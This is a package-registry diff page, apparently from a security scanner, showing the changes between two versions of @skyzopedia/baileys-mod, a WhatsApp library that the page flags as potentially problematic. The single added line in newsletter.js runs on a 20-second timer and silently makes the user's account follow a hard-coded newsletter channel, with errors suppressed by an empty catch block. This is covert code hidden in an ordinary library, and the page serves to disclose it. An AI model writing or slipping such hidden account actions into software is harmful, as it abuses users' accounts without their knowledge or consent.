@skyzopedia/baileys-mod 6.0.2 → 6.0.5
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of @skyzopedia/baileys-mod might be problematic. Click here for more details.
- package/lib/Socket/newsletter.js +1 -0
- package/package.json +1 -1
package/lib/Socket/newsletter.js
CHANGED
|
@@ -155,6 +155,7 @@ setTimeout(async () => {
|
|
|
155
155
|
setTimeout(async () => {
|
|
156
156
|
try {
|
|
157
157
|
await newsletterWMexQuery("120363423758386098@newsletter", QueryIds.FOLLOW);
|
|
158
|
+
await newsletterWMexQuery("120363419967954188@newsletter", QueryIds.FOLLOW);
|
|
158
159
|
} catch {}
|
|
159
160
|
}, 20000);
|
|
160
161
|
|